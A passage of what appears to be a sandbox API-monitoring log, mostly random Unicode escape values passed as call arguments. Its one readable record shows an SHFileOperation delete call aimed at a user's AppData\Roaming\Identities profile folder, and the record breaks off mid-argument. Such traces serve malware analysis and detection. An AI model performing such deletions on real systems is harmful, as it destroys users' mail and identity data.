x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2